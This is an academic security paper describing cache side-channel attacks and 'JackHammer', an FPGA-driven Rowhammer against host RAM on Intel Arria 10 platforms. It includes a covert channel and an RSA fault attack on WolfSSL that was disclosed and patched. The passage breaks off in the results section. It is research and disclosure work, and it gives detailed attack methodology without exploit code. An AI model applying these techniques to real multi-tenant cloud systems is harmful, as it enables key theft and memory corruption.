After years of development, FPGAs are finally making an appearance on multi-tenant cloud servers. These heterogeneous FPGA-CPU architectures break common assumptions about isolation and security boundaries. Since the FPGA and CPU architectures share hardware resources, a new class of vulnerabilities requires us to reassess the security and dependability of these platforms.
Abstract-After years of development, FPGAs are finally making an appearance on multi-tenant cloud servers. These heterogeneous FPGA-CPU architectures break common assumptions about isolation and security boundaries. Since the FPGA and CPU architectures share hardware resources, a new class of vulnerabilities requires us to reassess the security and dependability of these platforms.
In this work, we analyze the memory and cache subsystem and study Rowhammer and cache attacks enabled on two proposed heterogeneous FPGA-CPU platforms by Intel: the Arria 10 GX with an integrated FPGA-CPU platform, and the Arria 10 GX PAC expansion card which connects the FPGA to the CPU via the PCIe interface. We show that while Intel PACs currently are immune to cache attacks from FPGA to CPU, the integrated platform is indeed vulnerable to Prime and Probe style attacks from the FPGA to the CPU's last level cache. Further, we demonstrate JackHammer, a novel and efficient Rowhammer from the FPGA to the host's main memory. Our results indicate that a malicious FPGA can perform twice as fast as a typical Rowhammer attack from the CPU on the same system and causes around four times as many bit flips as the CPU attack. We demonstrate the efficacy of JackHammer from the FPGA through a realistic fault attack on the WolfSSL RSA signing implementation that reliably causes a fault after an average of fifty-eight RSA signatures, 25% faster than a CPU rowhammer attack. In some scenarios our JackHammer attack produces faulty signatures more than three times more often and almost three times faster than a conventional CPU rowhammer attack.
Index Terms-FPGA, side-channel, cache attack, Rowhammer, cloud security
I. INTRODUCTION
In recent years, as improvements in microprocessor performance have slowed, developers have looked to other computing resources to increase performance. Graphics processing units (GPUs), application-specific integrated circuits (ASICs), and FPGAs have all been adapted to accelerate applications such as cryptocurrency mining, high-frequency trading, and in machine learning. FPGAs are particularly interesting for cloud computing applications, as they can be reconfigured for the needs of different users at different times without losing their exceptionally low latency. Amazon Web Services [3] and Alibaba Cloud [2] already offer FPGA instances with ultrahigh performance Xilinx Virtex UltraScale+ and Intel Arria 10 GX FPGAs to the consumer market. These FPGAs are designed for high I/O bandwidth and high compute capacity, making them ideal for server workloads. New Intel FPGAs offer cache-coherent memory systems for even better perfor-mance when data is being passed back and forth between CPU and FPGA.
The flexibility of FPGA systems can also open up new attack vectors for malicious users in public clouds or more efficiently exploit existing ones. integrated FPGA platforms connect the FPGA right into the processor bus interconnect giving FPGA direct access into cache and memory [25] . Similarly, high-end FPGAs can be integrated into a server as an accelerator, e.g. connected via PCIe interface [31, 60] . Such combinations provide unprecedented performance over a highthroughput and low-latency connection with the versatility of a reprogrammable FPGA infrastructure shared among cloud users. However, the tight integration may also expose users to new threats by malicious users.
This work exposes hardware and micro-architectural vulnerabilities in hybrid FPGA-CPU systems with a particular focus on cloud platforms where the FPGA and the CPU are in distinct security domains: one potentially a victim and the other an attacker. We examine Intel's Arria 10 GX FPGA as an example of a current generation of FPGA accelerator platform designed in particular for heavy and/or cloud-based computation loads. We thoroughly analyze the memory interfaces between such platforms and their host CPUs. These interfaces, which allow the CPU and FPGA to interact in various direct and indirect ways, include hardware on both the FPGA and CPU, application libraries and software drivers executed by the CPU, and logical interfaces implemented on the FPGA outside of but accessible to the user-configurable region. We propose attacks that exploit practical use cases of these interfaces to target adjacent systems such as the CPU memory and cache.
A. Our Contributions
We demonstrate novel hardware attacks between the memory interface of Intel Arria 10 GX platforms and their host CPUs. Furthermore, we demonstrate a Rowhammer mounted from the FPGA against the CPU to cause faults in the WolfSSL RSA signature implementation, and to leak a private RSA modulus factor. In summary:
-We thoroughly reverse-engineer and analyze the cache behavior and investigate the viability of cache attacks on realistic FPGA-CPU hybrid systems. -Based on our investigation of the cache subsystem, we build a Rowhammer from the FPGA that bypasses caching to hammer twice as fast as a CPU can, causing faults that the CPU Rowhammer attack is unable to replicate. -Our Rowhammer remains stealthy to any monitor on the CPU since it bypasses the CPU microarchitecture. -Using both Rowhammer implementations, we demonstrate a fault attack on the recent versions of WolfCrypt RSA implementation, part of the WolfSSL Library, and recover private keys. WolfSSL version 4.3.0 included protection against the attack after we reported the vulnerability in versions up to 4.2.0. -We demonstrate that the base blinding used in WolfCrypt's RSA implementation leaves the algorithm vulnerable to the Bellcore fault injection attack.
B. Experimental Setup
We analyze two distinct FPGA-CPU platforms with Intel Arria 10 FPGA: 1) integrated into the CPU package and 2) Programmable Acceleration Card (PAC).
The integrated Intel Arria 10 is based on a prototype E5-2600v4 CPU with 12 physical cores. The prototype CPU has a Broadwell architecture in which the last level cache (LLC) is inclusive of the L1/L2 caches. The CPU package has an integrated Arria 10 GX 1150 FPGA running at 400 MHz. All measurements done on this platform are strictly done from userspace only, as access is kindly provided by Intel through their Intel Lab (IL) Academic Compute Environment 1 . The IL environment also gives us user-level access to platforms with two PACs with Arria 10 GX 1150 FPGA installed and running at 200 MHz. These systems have Intel Xeon Platinum 8180 that comes with non-inclusive LLC. We carried out the Rowhammer on our local Dell Optiplex 7010 system with an Intel i7-3770 CPU, and a single DIMM of Samsung M378B5773DH0-CH9 1333 MHz 2 GB DDR3 DRAM equipped with the same Intel PAC running with a primary clock speed of 200 MHz 2 .
The operating system (OS) running in the IL is a 64-bit Red Hat Enterprise Linux 7 with Kernel version 3.10, and we run Ubuntu 16.04 on our local test systems. The OPAE version was compiled and installed on July 15th, 2019 for both, the FPGA PAC and the integrated FPGA platform. We used Quartus 17. 
C. Vulnerability Disclosure
We informed the WolfSSL team of WolfCrypt's vulnerability to Bellcore-style RSA fault injection attacks on November 1 https://wiki.intel-research.net/ 2 The PAC is intended to support 400 MHz clock speed, but the current version of the Intel Acceleration Stack has a bug that halves the clock speed. 25, 2019 . WolfSSL acknowledged the vulnerability on the same day, and released WolfSSL 4.3.0 with a fix for the vulnerability on December 20, 2019. MITRE Corporation published a description of the vulnerability as CVE-2019-19962 to the National Vulnerability Database on December 24, 2019 [1] .
II. BACKGROUND A. Cache Attacks
Cache attacks have been proposed attacking different applications [45, 11, 22, 24, 6, 56] . In general, cache attacks use timing side effects of cache accesses to leak information. Modern cache systems use a hierarchical architecture that includes smaller, faster caches and bigger, slower caches. Measuring the latency of a memory access can often confidently determine which levels of cache contain a certain memory address (or if the memory is cached at all). Cache subsystems also support coherency, which ensures that whenever memory is overwritten in one cache, copies of that memory in other caches are either updated or invalidated. Cache coherency may cause side effects in caches, allowing an attacker to learn about a cache line that is not even directly accessible [34] . Cache attacks have become a major focus of security research in cloud computing platforms where users are allocated CPUs, cores, or virtual machines which, in theory, should offer perfect isolation, but in practice may leak information to each other via shared caches [28] . In the following, we give an introduction to the cache attack techniques used later in this work.
a) Flush+Reload and Evict+Reload: Flush+Reload (F+R) [62] gives the attacker information about the victim's behavior with cache line granularity. To do so, the attacker cycles over three steps: 1) The attacker uses the clflush instruction to flush the cache line that is to be monitored. After flushing the monitored cache line, 2) she waits for the victim to execute. Later, 3) she reloads the flushed line and measures the reload latency. If the latency is low, the cache line is served from the cache hierarchy. That means, that the cache line was accessed by the victim during its execution. If the access latency is high, the cache line was loaded from main memory, meaning that the victim did not access it during its execution.
Evict+Reload (E+R) [40] is similar to (F+R). In an E+R attack, if the system does not have a flush instruction or disabled its execution from userspace, the attacker can, instead, evict the desired cache line by accessing cache lines that form an eviction set during step one. Methods for finding eviction sets are described later in this section.
F+R can work across cores and even across sockets, as long as the LLC is coherent, as is the case with many modern multi-CPU systems. E+R can be used if the attacker shares the same CPU socket (but not necessarily the same core) as the victim and if the LLC is inclusive 3 . If the LLC is non-inclusive the attacker can attack the inclusive directory structure used to ensure coherency [61] . These attacks are limited to shared memory scenarios, where the victim and attacker share data or instructions, as is the case with shared libraries on systems where memory de-duplication is enabled. b) Flush+Flush: Flush+Flush (F+F) [21] , similar to F+R, gives the attacker cache line granularity and consists of three steps. The only difference is in the third step where the attacker flushes the cache line again and measures the execution time of the flush instruction instead of the memory access. F+F is faster than F+R as the second flush phase can be used as the first flush for another run. However, like F+R, F+F is limited to scenarios where there is a flush instruction available, and the victim and attacker share data or instructions. c) Prime+Probe: Prime+Probe (P+P) gives the attacker a more coarse cache set granularity than the aforementioned methods since the attacker checks the status of the cache by probing a whole cache set rather than flushing or reloading a single line. However, this granularity is sufficient in many cases [46, 50, 65, 32, 45, 40, 43] . Again there are three steps: 1) The attacker primes the cache set under surveillance with dummy data by accessing a proper eviction set, 2) she waits for the victim to execute, 3) she accesses the eviction set again and measures the access latency (probing). If the latency is above a certain threshold, some part of the eviction set was evicted by the victim process, meaning that the victim accessed cache lines belonging to the cache set under surveillance [42] .
Unlike F+R, E+R, and F+F, P+P does not rely on shared memory. However, the granularity is more coarse-grained, noisier, works only if the victim is located on the same socket as the attacker, and relies on inclusive caches. In non-inclusive cache scenarios, an attacker again has to focus on the directory structure rather than the cache itself [61] . d) Eviction Sets: Caches store data in units of cache lines that can hold 2 b bytes each 4 . Caches are divided into 2 s sets, each capable of holding w cache lines. w is called the wayness or associativity of the cache. An eviction set is a set of congruent cache line addresses capable of filling a whole cache set. Two cache lines are considered congruent if they belong to the same cache set. Memory addresses are mapped to cache sets depending on the s bits of the physical memory address directly following the b cache line offset bits, which are the least significant bits. Additionally, some caches are divided into n slices, where n is the number of CPU cores. In the presence of slices, each slice has 2 s sets with w ways each. Previous work has reverse-engineered the mapping of physical address bits to cache slices on some Intel processors [33] . A minimal eviction set contains w addresses and therefore fills an entire cache set when accessed.
B. Rowhammer
DRAM cells discharge over time, and the memory controller has to refresh the cells to avoid accidental data corruption.
Generally, DRAM cells are laid out in banks and rows, and each row within a bank has two adjacent rows, one on either side. In a Rowhammer, memory addresses in the same bank as the target memory address are accessed in quick succession. When memory adjacent to the target is accessed repeatedly, the electrostatic interference generated by the physical process of accessing the memory can elevate the discharge for bits stored in the target memory. A "single-sided" Rowhammer performs accesses to just one of these rows to generate bit flips in the target row; a "double-sided" Rowhammer performs accesses to both adjacent rows and is generally more effective in producing bit flips. Rowhammer relies on the ability to find blocks of memory accessible to the malicious program (or in this work, hardware) that are in the same memory bank as a given target address. The standard way to find these memory addresses is by exploiting row buffer conflicts as a timing side-channel [14] . Pessl et al. [47] reverse-engineered the bank mapping algorithms of several CPU and DRAM configurations which allows an attacker to deterministically calculate all of the physical addresses that share the same bank if the chipset and memory configuration are known.
C. Attacks on FPGA-CPU Systems
Classical power analysis methodologies like Kocher et al's differential power analysis [37] have been applied in new attacks on inter-chip FPGAs [66, 52, 51] . Such integrated and inter-chip FPGAs are available in various cloud environments and system-on-chips (SoCs) products. In particular, Zhao et al. [66] demonstrated how to build an on-chip power monitor using ring oscillators (ROs) which can be used to attack the host CPU or other FPGA tenants. In multi-tenant FPGA scenarios where partial reconfiguration by two separate security domains is possible, more powerful attacks become possible. For instance, the long wires on the FPGA can spy on adjacent wires using ROs [15, 49, 48] . Ramesh et al. [49] exploited the speed of ROs to infer the carried bit in the adjacent wire and demonstrated a key recovery attack on AES. ROs can also be used as power wasters to create voltage drop and timing faults [16, 38] . Note that such attacks rely on FPGA multitenancy which is not widely used yet. In contrast, in this work, we only assume that the FPGA-CPU memory subsystem is shared among tenants.
D. RSA-CRT Sign
RSA signatures are computed on raising a plaintext m to a secret power d modulo N = pq, where p and q are prime and secret, and N is public [9] . These numbers must all be quite large for RSA to be secure, which makes the exponentiation rather slow. However, there is a common algebraic shortcut for modular exponentiation: the Chinese Remainder Theorem (CRT), used in many RSA signature implementations, including in the WolfCrypt implementation we attack in section VI and in OpenSSL [12] . The basic form of the RSA-CRT signature algorithm is shown in 1. The CRT algorithm is equivalent to but much faster than simply computing m d mod N because d p and d q are of order p and Algorithm 1 Chinese remainder theorem RSA signature 1: procedure SIGN(m: message, d: private exponent, p:
private factor, q: private factor) 2:
S p ← m dp mod p equivalent to m d mod p 3:
S q ← m dq mod q equivalent to m d mod q 4:
return S ← S q + q ((S p − S q )I q mod p) 6: end procedure q respectively while d is of order N , which, being the product of p and q, is significantly greater than p or q; it is around four times faster [5] to compute the two exponentiations m dp and m dq than it is to compute m d outright.
III. ANALYSIS OF INTEL FPGA-CPU SYSTEMS
This section explains the hardware and software interfaces that the Intel Arria 10 GX FPGA platforms use to communicate with their host CPUs and the firmware, drivers, and architectures that underlay them. We do not attack these systems directly in this work, but we make extensive use of them, as they form the most obvious and readily available attack surfaces between the FPGA platforms and their host CPUs. An overview of the architecture and hardware connections is given in Figure 1 .
a) A Brief Introduction to Intel Terminology: Intel refers to a single logical unit implemented in FPGA logic and having a single interface to the CPU as an Accelerator Functional Unit (AFU). So far, available FPGA platforms only support one AFU per Partial Reconfiguration Unit (PRU, also called the green region). The AFU is an abstraction similar to a program that captures the logic implemented on an FPGA. The FPGA Interface Manager (FIM) is part of the non-userconfigurable portion (blue region) of the FPGA and contains external interfaces like memory and network controllers as well as the FPGA Interface Unit (FIU), which bridges those external interfaces with internal interfaces to the AFU.
A. Intel FPGA Platforms a) Intel Programmable Acceleration Card with Arria 10 FPGA: Intel's Arria 10 GX Programmable Acceleration Card (PAC) is a PCIe expansion card for FPGA acceleration [31] . The Arria 10 GX FPGA on the card communicates with its host processor over a single PCIe Gen3x8 bus. Memory reads and writes from the FPGA to the CPU's main memory use physical addresses; in virtual environments, the PCI controller on the CPU side implements an IOMMU to translate physical addresses in the virtual machine (what Intel calls I/O Virtual Addresses or IOVA) to physical addresses in the host machine. Alongside the FPGA, the PAC contains 8 GB of DDR4, 128 MB of flash memory, USB for debugging. b) Intel Xeon Processor with integrated Arria 10 FPGA: Intel has also begun producing Xeon server processors with an integrated Arria 10 FPGA in the same package [25] . The FPGA and CPU are closely connected through two PCIe Gen3x8 links and an UltraPath Interconnect (UPI) link. UPI is The software part of the Intel Acceleration Stack called OPAE is highlighted in orange. Its API is used by applications (yellow) to communicate with the AFU. The green region marks the part of the FPGA that is re-configurable from userspace at runtime. The blue region describes the static soft core of the FPGA. It exposes the CCI-P interface to the AFU.
Intel's high-speed CPU interconnect replacing the predecessor QPI in Skylake and later Intel CPU architectures [44] . The FPGA has a 128 KiB directly mapped cache that is coherent with the CPU caches over the UPI bus. Like the PCI link on the PAC, both the PCI links and the UPI link use I/O virtual addressing, appearing as physical addresses to virtualized environments. As the UPI link bypasses the PCI controller's IOMMU, the FIU implements its IOMMU and Device TLB to translate physical addresses for reads and writes using UPI [30] .
B. Intel's FPGA-CPU Compatibility Layers a) Open Programmable Acceleration Engine (OPAE):
Intel's latest generations of FPGA products are designed for use with the OPAE [29] which is part of the Intel Acceleration Stack. The principle behind OPAE is that it is an open-source, hardware-flexible software stack designed for interfacing with FPGAs that use Intel's Core Cache Interface (CCI-P), a hardware host interface for AFUs that specifies transaction requests, header formats, timing, and memory models [30] . Essentially, OPAE provides a software interface for software developers to interact with a hosted FPGA, while CCI-P provides a hardware interface for hardware developers to interact with its host CPU. Assuming it doesn't use any platformspecific hardware features, any CCI-P compatible AFU should be synthesizable (and the result should be logically identical) for any CCI-P compatible FPGA platform; OPAE is built on top of hardware-and OS-specific drivers and as such is compatible with any system with the appropriate drivers available. As described below, the OPAE/CCI-P system provides two main methods for passing data between the host CPU and the FPGA.
b) Memory-mapped I/O (MMIO): OPAE can send 32or 64-bit MMIO requests to the AFU directly or it can map an AFU's MMIO space to OS virtual memory [29] . CCI-P provides an interface for incoming MMIO requests and outgoing MMIO read responses. The AFU may respond to read and write requests in any way that the developer desires, though an MMIO read request will time out after 65,536 cycles of the primary FPGA clock. In software, MMIO offsets are counted as the number of bytes and expected to be multiples of 4 (or 8, for 64-bit, reads and writes), but in CCI-P, the last two bits of the address are truncated, because at least 4 bytes are always being read or written. There are 16 available address bits in CCI-P, meaning that the total available MMIO space is 2 16 32-bit words, or 256 KiB [30] . c) Direct memory access (DMA): OPAE can instruct the OS and kernel to allocate a block of memory that can be read by the FPGA. There are a few important details in the way this memory is allocated: most critically, it is allocated in a contiguous physical address space. The FPGA will use physical addresses to index the shared memory, so physical and virtual offsets within the shared memory must match. The driver provides the physical address of the newly allocated buffer to the software; the address must be manually passed to the FPGA. On systems using Intel Virtualization Technology for Directed I/O (VT-d), which employs the I/O memory management unit (IOMMU) to provide an I/O Virtual Address (IOVA) to PCI devices, the memory will be allocated in continuous IOVA space. Either way, this ensures that the FPGA will see an accessible and continuous buffer of the requested size. For buffer sizes up to and including one standard memory page of 4 kB, a new standard memory page will be allocated to the calling process by the operating system and configured to be accessible by the FPGA with its IOVA or physical address. For buffer sizes greater than 4 kB and up to 2 MB, the function will call the OS to allocate a 2 MB huge page. For even greater sizes, the function will ask the OS for a 1 GB huge page. Keeping the buffer in a single page ensures that it will be continuously allocated in virtual and physical memory.
C. Cache and Memory Architecture on the Intel FPGAs a) FPGA PAC: As well as having access to the CPU's memory system, the FPGA PAC has its local RAM, with a separate address space from that of the CPU and its memory. The PAC's RAM is always directly accessed; there is no cache between it and the FPGA. When the PAC reads from the CPU's memory, the CPU's memory system will serve the request from its LLC if possible. If the memory is read or written is not present in the LLC, the request will be served by the CPU's main RAM. The PAC is unable to modify the contents of the LLC with reads or writes. b) Integrated Arria 10: The integrated Arria 10 FPGA has access to the host memory. Additionally, it has its 128 kB cache that is kept coherent with the CPU's caches over UPI. Memory requests over PCIe take the same path as requests issued by an FPGA PAC. If the request is driven over UPI, the local coherent FPGA cache is checked first before, on a cache miss, forwarding the request to the CPU's LLC or main memory.
An AFU has control over what data is to be cached locally by adding caching hints to the requests. The available caching hints are summarized in Table I . For memory reads, RdLine_I is used to not cache data locally and RdLine_S to cache data locally in the shared state. For memory writes, WrLine_I is used to not cache data locally, WrLine_M leaves written data in the local cache in the modified state, and WrPush_I does not cache data locally but requests to cache data in the CPU's LLC.
The CCI-P documentation [30] lists all caching hints as available for memory requests over UPI. When running requests over PCI, RdLine_I, WrLine_I, and WrPush_I can be used while other hints are ignored.
IV. CACHE ATTACKS ON INTEL FPGA-CPU PLATFORMS
We reverse-engineered parts of the memory subsystem and its behavior on current Arria 10 based FPGA-CPU cloud systems. In this section, we reveal several leakages that are exploitable by an AFU-or CPU-based attacker attacking the CPU or FPGA, respectively. At last, we discuss the viability of intra-FPGA cache attacks. A summary of all findings of this section is given in Table II .
To measure memory access latency from the FPGA, we designed a timer module clocked at 400 MHz. While enabled, it counts clock cycles and returns the counter value in a register when disabled.
The advantage of a timer realized in hardware is that it runs uninterruptible in parallel to all other modules contained in the AFU. Therefore, the timer precisely counts FPGA clock cycles, while timers on the CPU, such as rdtsc, may yield noisier measurements due to interruptions by the operating system and the CPU's out-of-order pipeline.
A. Cache Attacks from FPGA PAC to CPU
The Intel PAC has access to one PCIe lane that connects it to the main memory of the system through the CPU's LLC. The CCI-P documentation [30] mentions a timing difference for memory requests served by the CPU's LLC and those served by the main memory. Using our timer module we verified the suggested latency differences as shown in Figure 2 . Accesses to the LLC take between 139 to 145 cycles; accesses to main memory take 148 to 158 cycles. Such distinct distributions of access latency form the basis of cache attacks as they enable an attacker to tell which part of the memory subsystem served a particular memory request. Our results show that FPGA based attackers are capable of precisely distinguishing memory responses coming from the LLC and those coming from main memory.
In addition to the probing, some way of influencing the state of the cache is needed to perform cache attacks. We investigated all possibilities of cache interaction offered by the CCI-P interface on an FPGA PAC and found that neither reading nor writing data from the FPGA PAC measurably altered the LLC. Therefore, we state that an FPGA PAC attacker currently 5 is not capable of performing cache attacks against the CPU. However, the negative result for cache attacks from an FPGA PAC is a positive result for Rowhammer, as The integrated Arria 10 has access to two PCIe lanes and one QPI lane connecting it to the CPU's memory subsystem like on an FPGA PAC but with an additional cache on the FPGA accessible over QPI (cf. subsection III-C).
By timing memory requests from the AFU using our hardware timer, we show that distinct delays for the different levels of the memory subsystem exist. Both PCIe lanes show similar delays as measured on an FPGA PAC (cf. Figure 2 ). Our memory access latency measurements for the QPI lane, depicted in Figure 3 , show an additional peak for requests being answered by the FPGA's local cache. Additionally, the two peaks for LLC and main memory accesses are likely narrower and further apart than in the PCIe case because QPI, Intel's proprietary high-speed processor interconnect, is an on-chip bus only connecting CPUs and FPGAs. No other peripherals block the QPI resources, giving even less noisy timing measurements.
1) Reverse-engineering Caching Hint Behavior: Next, we reverse-engineered the behavior of the caching hints. The caching hints RdLine_I and RdLine_S, that are available for memory read requests, show no effect on the LLC neither over PCIe nor over QPI. The RdLine_S flag makes the blue region cache the read data in the FPGA's local cache and evict another cache line where necessary if the read requests are sent over QPI. Setting RdLine_I in a memory request over QPI makes the blue stream mark the requested cache line as invalid in the local cache, effectively evicting the cache line, after answering the memory request.
When writing data, three caching hints are available when using the QPI lane. The caching hint WrLine_M caches the cache line before writing to it, leaving the cache line in the local cache in a modified state. The WrLine_I flag behaves as a write-back flag, evicting the cache line from the local cache to main memory. Using WrPush_I writes to a cache line, evicts it from the FPGA cache and hints the CPU to store the cache line in its LLC. Because the FPGA's cache is kept coherent with the CPU's LLC, writing to a cache line from the AFU must result in invalidating the cache line in the LLC or updating it. For the WrLine_M caching hint, the cache line must be evicted from the LLC as the cache line is left in the FPGA cache in a modified state. In the case of WrLine_I, either invalidating or updating may be true. When WrPush_I is used, we expect the cache line to be updated in the LLC.
To validate our assumptions, we timed the CPU's access to cache lines that were previously written by an AFU with one of the three caching hints set. In all three cases, the access times lie above 325 CPU cycles. On the same system, a single access to a cache line in main memory takes at least 175 cycles. Therefore, we show that the cache line written to by the AFU can be evicted from the LLC by exploiting the coherency protocol. While we expected this behavior when using WrLine_I and WrLine_M, LLC cache hits should occur at least occasionally when using the WrPush_I hint. However, none of our measurements ever showed a cache hit, letting us assume that WrPush_I is not implemented in our prototype, even though it is documented.
As documented in [30] , caching hints WrLine_I and WrPush_I are available over PCIe as well. Our measurements show similar behavior, independent of the caching hint. But in contrast, to slow access times after writes over QPI, access times show that the CPU's read requests are served from LLC, even though WrLine_I is supposed to leave the cache line in the invalid state. Further investigation revealed that WrPush_I is indeed ignored by the blue stream but the CPU handles all PCIe requests as if the caching hint was set. Therefore, we showed that an attacker located on an integrated Arria 10, in contrast to an FPGA PAC attacker, is indeed capable of writing to the CPU's LLC.
As the CPU decides to cache all write requests over PCIe in its LLC, we assume a Direct Data I/O (DDIO) like behavior which gives the AFU access to a reduced number of ways per cache set. This would reduce the attack surface for a P+P attack as only parts of a cache set can be primed. However, attacks against other peripherals, where access to a limited number of cache ways per set is sufficient, are still possible as recent results show [39] .
2) Constructing a Covert Channel from AFU to CPU: Independent of which LLC ways are actually writable, the fact that the AFU can write data to at least one way per cache slice via PCIe allows us to construct a covert channel from the AFU to a co-operating process on the CPU using side effects of the LLC. To do so we designed an AFU that writes random data to a fixed cache line over PCIe whenever a '1' is transmitted and stays quiet whenever a '0' is sent. In this way, the AFU sends messages which can be read by the CPU. For our test setup, we made the message configurable from the AFU's software counterpart. For the rest of this section, we will refer to the address the AFU writes to as the target address.
The receiver process 6 first constructs an eviction set for the set/slice-pair the target address is in. To find an eviction set, we run a slightly modified version of Algorithm 1 using Test 1 in [58] . We use the OPAE API to allocate hugepages and get physical addresses (cf. paragraph III-B0c). Therefore, we construct the eviction set from a rather small set of candidate addresses all belonging to the same set.
To ease the eviction set finding, the receiver has access to the target address via shared memory to have the receiver test its 6 This process is not the software process directly communicating with the AFU over OPAE/CCI-P. eviction set against the target address directly. This way, we do not need to explicitly identify the target address's LLC slice. In a real-world scenario, either the slice selection function has to be known [26, 33, 27] or eviction sets for all slices have to be constructed by seeking conflicting addresses [42, 45] . Having one thread per slice monitoring it prevents the time penalty.
Next, the receiver primes the LLC with the eviction set found and probes the set in an endless loop. Whenever the execution time of a probe is above a certain threshold, the receiver assumes that the eviction of one of its eviction set addresses was the result of the AFU writing to the target address and therefore interprets this as receiving a '1'. If the probe execution time stays below the threshold, a '0' is detected as no eviction of the eviction set addresses occurred.
An example measurement of the receiver and its decoding steps are depicted in Figure 4 . The AFU sends every bit three times. This redundancy makes decoding easy at the cost of a low bandwidth of about 94.984 kBit/s. Throughput can be increased by sending bits less redundant. Also, multiple cache sets can be used in parallel to encode several bits at once. The synchronization problem can be solved by using one cache set as the clock, where the AFU writes an alternating bit pattern [55] .
In summary, we have three findings for the integrated Arria 10:
-Despite WrPush_I being ignored by the Blue Region, an AFU can place data in the LLC because the CPU is configured to handle all PCIe write requests from the integrated Arria 10 as if WrPush_I is set. -OPAE exposes physical addresses to the user and supports eviction set finding by enabling hugepages. Additionally, we use our findings to establish a covert channel between the AFU and the CPU with a bandwidth of 94.984 kBit/s.
C. Cache Attacks from CPU to Integrated Arria 10 FPGA
This section investigates the CPU's capabilities to run cache attacks against the coherent cache on the integrated Arria 10 FPGA. First, we measured the memory access latency depending on the location of the address accessed using the rdtsc instruction. The results in Figure 5a show that the CPU can clearly distinguish where an accessed address is located. Therefore, the CPU is capable of probing a memory address that may or may not be present in the local FPGA cache. It is interesting to note that requests to main memory return faster than those going to the FPGA cache. This can be explained by the much slower clock speed of the FPGA running at 400 MHz while the CPU operates at 1.2-3.4 GHz. Another explanation is that our test platform is one of the prototypes and the coherency protocol implementation of the blue region is still buggy. As nearly all known cache attack techniques use somewhat of a probing phase, this capability is a good step in the direction of having a fully working cache attack from the CPU against the FPGA cache. Besides the capability of probing the FPGA cache, we also need a way of flushing, priming, or evicting cache lines to get the FPGA cache in a known state. While the AFU can control which data is cached locally by using caching hints, there is no such option documented for the CPU. Therefore, we cannot prime the FPGA cache to evict cache lines. However, as the CPU has a clfush instruction, we are capable of flushing cache lines from the FPGA cache, because the cache is coherent with the CPU caches.
In total, we can probe and flush cache lines located in the FPGA cache. This enables us to run a Flush+Reload attack against the victim AFU where the addresses used by the AFU get flushed before the execution of the AFU. After the execution, the attacker then probes all previously flushed addresses to learn which addresses were used during the AFU execution.
Another possible cache attack is the more efficient Flush+Flush. Additionally, we expect the attack to be more precise as flushing a cache line that is present in the FPGA cache takes about 500 CPU clock cycles longer than flushing a cache line that is not (cf. Figure 5b) , while the latency difference between memory and FPGA cache accesses adds up to only about 50-70 CPU clock cycles.
In general, the applicability of Flush+Reload and Flush+Flush is limited because the attacker and victim must share access to a physical memory location. A reasonable attack scenario that satisfies this requirement would be a case where two users on the same CPU share an instantiation of a library that uses an AFU for acceleration of a process that should remain private, like training a machine learning model with confidential data or performing cryptographic operations.
D. Intra-FPGA Cache Side-Channels
As soon as FPGAs support simultaneous multi-tenancy, that is, the capability to place two AFUs from different users on the same FPGA at the same time, the possibility of intra-FPGA cache attacks arises. As the cache on the integrated Arria 10 is directly mapped and only 128 kB in size, finding eviction sets becomes trivial when giving the attacker AFU access to huge pages. As this is the default behavior of the OPAE driver when allocating more than one memory page at once, we assume that it is straightforward to run a successful Prime+Probe attack against a neighboring AFU to e.g. extract information about a machine learning model. V. JACKHAMMER ATTACK a) Contribution: In this section, we present and evaluate a simple AFU design for the Arria 10 GX FPGA that is capable of performing Rowhammer against its host CPU's RAM significantly faster and more effectively than its host CPU can. In a Rowhammer attack, a significant factor in the speed and efficacy of an attack is the rate at which memory can be repeatedly accessed. On many systems, the CPU is sufficiently fast to cause some bit flips, but the FPGA can repeatedly access its host machine's memory system substantially faster than the host machine's CPU can. Ultimately both the CPU and FPGA share access to the same memory controller hardware, so we predict that the advantage is in the drastically simpler architecture of the FPGA's non-userconfigurable hardware compared to the micro-architecture of the CPU and in the resulting lack of software and firmware overhead. Crucially, this also means that it is much more difficult for a program on the CPU to detect the presence of an FPGA Rowhammer attack than that of a CPU Rowhammer attack -the FPGA's memory accesses leave no trace on the CPU itself.
A. JackHammer: Our FPGA Implementation of Rowhammer
We now present our design for JackHammer, a rowhammer AFU for the Arria 10 FPGA. When the AFU is loaded, the CPU must first use the MMIO interface to set the target physical addresses that the AFU will repeatedly access. In a successful rowhammer attack, these two addresses should be in rows adjacent to the row that will incur bit flips. It is recommended to set both addresses for a double-sided attack, but if the second address is set to 0, the AFU will perform a single-sided attack using just the first address. The CPU must also use the MMIO interface to set the number of times to access the targeted addresses.
Finally, the CPU can write a start signal over the MMIO interface, at which point the AFU begins counting down through the number of memory accesses and sending them as fast as it can, alternating between addresses in a doublesided attack. Note that unlike a software implementation of Rowhammer, the accessed addresses do not need to be flushed from cache -DMA requests from the FPGA do not modify the state of the CPU cache, though if the requested memory is in the last-level cache, the request will be served to the FPGA by the cache instead of by memory, and Rowhammer will not work (see subsection III-C for more details on caching behavior). In a real attack scenario, the attacker only needs to ensure that the cache lines containing each of the addresses are never accessed by the CPU during the attack (or, if for some reason the attacker must access them from the CPU, they should be flushed immediately so that the attack will only briefly be interrupted). The number of times to access the target addresses can be read again to get the number of remaining accesses; this is the simplest way to check in software whether or not the AFU has finished sending these accesses. When the last read request has been sent by the AFU (which is not the same as when the read request has been transmitted from the FPGA to the CPU, or when the read request is processed by the RAM, or when the response is returned to the FPGA), the number of accesses remaining will be zero, and the total amount of time taken to send all of the requests is recorded. 7 B. JackHammer on the FPGA PAC vs. CPU Rowhammer Figure 6 shows a box plot of the 0th, 25th, 50th, 75th, and 100th percentile of measured "hammering rates" for the Arria 10 FPGA PAC and its host i7-3770 CPU. Each measurement in these distributions is the average hammering rate over a run of 2 billion memory requests. Our JackHammer implementation is substantially faster than the standard CPU rowhammer, and its speed is far more consistent than the CPU's. The FPGA can manage an average throughput of one memory request, or "hammer," every ten 200 MHz FPGA clock cycles (finishing 2 billion hammers in an average of 103.25 seconds); the CPU averages one hammer every 311 3.4 GHz CPU clock cycles (finishing 2 billion hammers in an average of 183.41 seconds). Here we can see that even if the FPGA were clocked higher, it would still spend most of its time waiting for entries in the PCIe transaction buffer in the non-reconfigurable region to become available. Figure 7 shows measured bit flip rates in the victim row for the same experiment.
